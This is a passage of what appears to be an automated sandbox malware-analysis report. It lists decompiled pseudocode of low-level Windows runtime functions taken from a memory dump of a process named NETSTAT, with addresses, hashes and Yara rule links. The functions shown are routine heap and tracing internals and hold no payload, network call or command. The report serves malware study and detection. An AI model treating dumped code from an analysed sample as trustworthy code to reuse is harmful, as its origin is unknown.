				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0339B640(E03399AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                0x03428f6a
                0x03428f79
                0x03428f81
                0x03428f84
                0x03428f8b
                0x03428f91
                0x03428f94
                0x03428f9e
                0x03428fb0
                0x03428fa0
                0x03428fa9
                0x03428fa9
                0x03428fbb
                0x03428fbc
                0x03428fbe
                0x03428fc3
                0x03428fd6

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ba73fd562bb2efc7491bee9c43bd4126d1b00c5d627d0826a110ade825ee2403
                • Instruction ID: 7cc80b2f81f2975781b9fb79976d93e6ea381de50614168d647a33797557ab19
                • Opcode Fuzzy Hash: ba73fd562bb2efc7491bee9c43bd4126d1b00c5d627d0826a110ade825ee2403
                • Instruction Fuzzy Hash: DB01E174E01218AFDB14EFA8D545AAEB7F4EF48700F50445AB915EF381EA74DA00CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0341131B Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                C-Code - Quality: 48%
                			E0341131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x344d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03377D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0339B640(E03399AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                0x0341131b
                0x0341132a
                0x03411330
                0x03411336
                0x0341133e
                0x03411341
                0x03411344
                0x0341134f
                0x03411361
                0x03411351
                0x0341135a
                0x0341135a
                0x0341136c
                0x0341136d
                0x0341136f
                0x03411374
                0x03411387

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4158d9fd77ce1f45d9615f0b8ef54dd2a62429bdcffca250be63bd7d6e268308
                • Instruction ID: 008169aaf9fe8ffb0436cf50bbe1a307bdf3f171ef3feef3f0f99485f0f6783d
                • Opcode Fuzzy Hash: 4158d9fd77ce1f45d9615f0b8ef54dd2a62429bdcffca250be63bd7d6e268308
                • Instruction Fuzzy Hash: C7013C75E0160CAFDB04EFA9D545AAEB7F4FF08700F00406AB905EF381E634AA10CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03411608 Relevance: .0, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 46%
                			E03411608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x344d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03377D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0339B640(E03399AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                0x03411608
                0x03411617
                0x0341161d
                0x03411625
                0x03411628
                0x0341162b
                0x03411636
                0x03411648
                0x03411638
                0x03411641
                0x03411641
                0x03411653
                0x03411654
                0x03411656
                0x0341165b
                0x0341166e

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 43ae284e6d6e30bba1262b4c2c950a36cc61cfccfe5e287318c3bcbc4f0940c3
                • Instruction ID: 310bac8b0fe9cfd222ecfa17d1825916044bfad9499c128da35d2ce6d7391d40
                • Opcode Fuzzy Hash: 43ae284e6d6e30bba1262b4c2c950a36cc61cfccfe5e287318c3bcbc4f0940c3
                • Instruction Fuzzy Hash: 5CF06D75E10748EFDB14EFA8D845AAEB7F4EF18300F04406AA915EF391EA349900CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0337C577 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0337C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0337C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x33311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E034288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                0x0337c577
                0x0337c57d
                0x0337c581
                0x0337c5b5
                0x0337c5b9
                0x0337c5ce
                0x0337c5ce
                0x0337c5ca
                0x00000000
                0x0337c5ca
                0x0337c5c4
                0x0337c5c8
                0x00000000
                0x00000000
                0x00000000
                0x0337c5ad
                0x00000000
                0x0337c5af

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 831fe211a3a807ea14f66c92d4bd0e79018693d168ce22d81b5e31fd6a4697b3
                • Instruction ID: d81cd5a7aefbd797bebc8c73c568abccf5ec1e0539785d893e9f3f69b599c269
                • Opcode Fuzzy Hash: 831fe211a3a807ea14f66c92d4bd0e79018693d168ce22d81b5e31fd6a4697b3
                • Instruction Fuzzy Hash: 6AF0B4B2915B919FD731DB16C8C4B21BFDC9B057F0F4CA4A7D40587501C6AEDC84CA50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0339927A Relevance: .0, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 54%
                			E0339927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0339FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E033992C6(_t11, _t14);
				}
				return _t11;
			}





                0x03399295
                0x03399299
                0x0339929f
                0x033992aa
                0x033992ad
                0x033992ae
                0x033992af
                0x033992b0
                0x033992b4
                0x033992bb
                0x033992bb
                0x033992c5

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                • Instruction ID: c45d431f8d42b9b7efd6971f8145fe4d8365175ee57400241ae68f47d675e5d4
                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                • Instruction Fuzzy Hash: 7CE09B32740640ABEB61EE56DCC4F57775DDF82721F04407DB5045E242C6E6DD0987A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03428D34 Relevance: .0, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E03428D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x344d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E03377D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0339B640(E03399AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                0x03428d34
                0x03428d43
                0x03428d4b
                0x03428d4e
                0x03428d52
                0x03428d5c
                0x03428d6e
                0x03428d5e
                0x03428d67
                0x03428d67
                0x03428d79
                0x03428d7a
                0x03428d7c
                0x03428d81
                0x03428d94

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 56087b20d71cd50312639776407c774c150f3a2fd6a332fe9a4a44dcb48f640d
                • Instruction ID: 924782344b39e4b220d713722291cedcdc723457fe32d5f2d89475d9e6a5fe3c
                • Opcode Fuzzy Hash: 56087b20d71cd50312639776407c774c150f3a2fd6a332fe9a4a44dcb48f640d
                • Instruction Fuzzy Hash: E7F09074E047189FDB14EBB8D441A6EB7B4EB04600F50809AE905AF281EA34D9008754
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03412073 Relevance: .0, Instructions: 32COMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E03412073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0340FD22(__ecx);
				_t19 =  *0x344849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x3448748; // 0x0
					if(__eflags <= 0) {
						E03411C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x3448724 & 0x00000004;
							if(( *0x3448724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x3448724; // 0x0
					return E03408DF1(__ebx, 0xc0000374, 0x3445890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                0x03412076
                0x03412078
                0x0341207d
                0x03412083
                0x034120a4
                0x034120aa
                0x034120ac
                0x034120b7
                0x034120ba
                0x034120bc
                0x034120c9
                0x034120c9
                0x034120d0
                0x034120d2
                0x00000000
                0x034120d2
                0x034120be
                0x034120c3
                0x034120c5
                0x034120c7
                0x00000000
                0x00000000
                0x034120c7
                0x034120bc
                0x034120d4
                0x03412085
                0x03412085
                0x034120a3
                0x034120a3

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 598588262a689ad800d849ee2413f512da31aae22eb3cf9df2946fb28b54b681
                • Instruction ID: d222236bc716e4cb026e1489ca07349a9bb0e8842b5518da7519c346230b3897
                • Opcode Fuzzy Hash: 598588262a689ad800d849ee2413f512da31aae22eb3cf9df2946fb28b54b681
                • Instruction Fuzzy Hash: 51F0273E411A984ADE32EB2536112D27FC4CB45110B0D09E7D650AF305C67588A3CA1C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03428B58 Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 36%
                			E03428B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x344d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E03377D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0339B640(E03399AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                0x03428b67
                0x03428b6f
                0x03428b72
                0x03428b7d
                0x03428b8f
                0x03428b7f
                0x03428b88
                0x03428b88
                0x03428b9a
                0x03428b9b
                0x03428b9d
                0x03428ba2
                0x03428bb5

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 956aae2775f463cc86313b72796406c77f4101e9418584680f36c6f32fbcf868
                • Instruction ID: 4ec5c9d3af31cabd72a372c47675afc3578af05467b6f984a16b198890fa476d
                • Opcode Fuzzy Hash: 956aae2775f463cc86313b72796406c77f4101e9418584680f36c6f32fbcf868
                • Instruction Fuzzy Hash: E9F05EB4E04258ABDB10EBA8D946A7EB7A4EB04600F44045AB915AF381EA34D900C798
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03354F2E Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E03354F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E034288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0337C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x3331030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                0x03354f2e
                0x03354f34
                0x03354f38
                0x033b0b85
                0x033b0b85
                0x033b0b89
                0x033b0b9a
                0x033b0b9a
                0x033b0b9f
                0x00000000
                0x033b0b9f
                0x033b0b94
                0x033b0b98
                0x00000000
                0x00000000
                0x00000000
                0x033b0b98
                0x03354f3e
                0x03354f48
                0x00000000
                0x03354f6e
                0x00000000
                0x03354f70

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e21b37c2c0f166dc4dbbccfe8ab98fa9f06d28c4b07f488f062aaef07e6c8ea
                • Instruction ID: 41e5eb5eb67b65fe9c7d7a5a1bc1143275544a94bcff83cb863b26ca07a2a8ab
                • Opcode Fuzzy Hash: 1e21b37c2c0f166dc4dbbccfe8ab98fa9f06d28c4b07f488f062aaef07e6c8ea
                • Instruction Fuzzy Hash: 3AF0E2369217948FD774D719CAC0FA3B7F8AB007BCF4854A5D9458BD21D728EC80C640
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0337746D Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E0337746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0336EB70(__ecx, 0x34479a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E033995D0();
							L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                0x0337746d
                0x0337746d
                0x0337746d
                0x03377471
                0x03377488
                0x033bf92d
                0x0337748e
                0x03377491
                0x03377495
                0x033bf937
                0x033bf93a
                0x033bf94e
                0x033bf953
                0x033bf956
                0x033bf956
                0x03377495
                0x00000000
                0x03377488
                0x03377473
                0x03377478
                0x0337747d
                0x03377481
                0x00000000
                0x03377481
                0x0337747d
                0x0337747a
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 154436c7372877c550a9bc924f6fd26ca1a03033ee296b6bbfee4187a11e72db
                • Instruction ID: abd09f80a8cff404eecea3214e118137a91a3e2581ee13c442fdedf35f086d07
                • Opcode Fuzzy Hash: 154436c7372877c550a9bc924f6fd26ca1a03033ee296b6bbfee4187a11e72db
                • Instruction Fuzzy Hash: FBF0B439904244EADF21D768CCC0BF9BB75AF04210F08015DD4E1AB550E72DD841C7C5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 03428CD6 Relevance: .0, Instructions: 31COMMON
                Download Yara Rule
                C-Code - Quality: 36%
                			E03428CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x344d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03377D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0339B640(E03399AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                0x03428ce5
                0x03428ced
                0x03428cf0
                0x03428cfb
                0x03428d0d
                0x03428cfd
                0x03428d06
                0x03428d06
                0x03428d18
                0x03428d19
                0x03428d1b
                0x03428d20
                0x03428d33

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6749a23023b45b819bf8eedb202e18441fe4a5a4961e9172be1906d064e5ea1b
                • Instruction ID: 851dff5fac706d2e03c7d4d1de85b78c8f552ede6a75848a8af1a03263a07786
                • Opcode Fuzzy Hash: 6749a23023b45b819bf8eedb202e18441fe4a5a4961e9172be1906d064e5ea1b
                • Instruction Fuzzy Hash: C4F08275E04218AFDF04EBA8E985E6EB7B4EF09300F54019AE915EF381EA34E904C758
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0338A44B Relevance: .0, Instructions: 29COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0338A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x3447b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03374620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0339FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                0x0338a44b
                0x0338a453
                0x0338a472
                0x0338a476
                0x00000000
                0x0338a493
                0x0338a47a
                0x0338a47f
                0x0338a486
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 317d0171a348587ed20ea046ad4164c2aa8146b27de64e99267d1d25f4888b0c
                • Instruction ID: 02f1c3c51a3ce757d02a5dbc3907f1f8368b1e2cc8894bfb51093939d1c9a9fb
                • Opcode Fuzzy Hash: 317d0171a348587ed20ea046ad4164c2aa8146b27de64e99267d1d25f4888b0c
                • Instruction Fuzzy Hash: 3EE092B2A05521ABD722AB18AC40F66B39DDBD4A51F0D4036E504DB224D628DD42C7E0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0335F358 Relevance: .0, Instructions: 28COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E0335F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0338F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03374620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                0x0335f35d
                0x0335f361
                0x0335f367
                0x0335f372
                0x0335f38c
                0x0335f38c
                0x0335f394

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                • Instruction ID: ec3c0e19e5942cd93a6e5700be7f80ac48f5e8a5f04ba6086448ed3464cf2030
                • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                • Instruction Fuzzy Hash: 28E0DF32A42218FBDB31EAD99E45FAABBACDB58A60F040195BD04DB150D564AE00C2D0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0336FF60 Relevance: .0, Instructions: 22COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0336FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x33311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E034288F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03370050(_t14);
				}
			}










                0x0336ff66
                0x0336ff6b
                0x00000000
                0x0336ff8f
                0x00000000
                0x0336ff8f

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fa334e87b075bc61ffa3021ce3f7f1963ec13a150179e8c084c2c8b2cb04431e
                • Instruction ID: 6f9a25ef22ef67e097068248def08afb621a86a901ffb7c845ec77c711e6c70b
                • Opcode Fuzzy Hash: fa334e87b075bc61ffa3021ce3f7f1963ec13a150179e8c084c2c8b2cb04431e
                • Instruction Fuzzy Hash: 5BE0DFB4A053049FD734DB52E4C0F297B9CAB42621F1DC29EE4084F509CA25D880C20A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0340D380 Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0340D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0335E8B0(__ecx, _a4, 0xfff);
					L033777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                0x0340d38a
                0x0340d39b
                0x0340d3b1
                0x00000000
                0x0340d3b6
                0x00000000

                Memory Dump Source
                • Source File: 0000000A.00000002.716785893.0000000003330000.00000040.00000800.00020000.00000000.sdmp, Offset: 03330000, based on PE: true
                • Associated: 0000000A.00000002.718051298.000000000344B000.00000040.00000800.00020000.00000000.sdmpDownload File
                • Associated: 0000000A.00000002.718064275.000000000344F000.00000040.00000800.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_10_2_3330000_NETSTAT.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
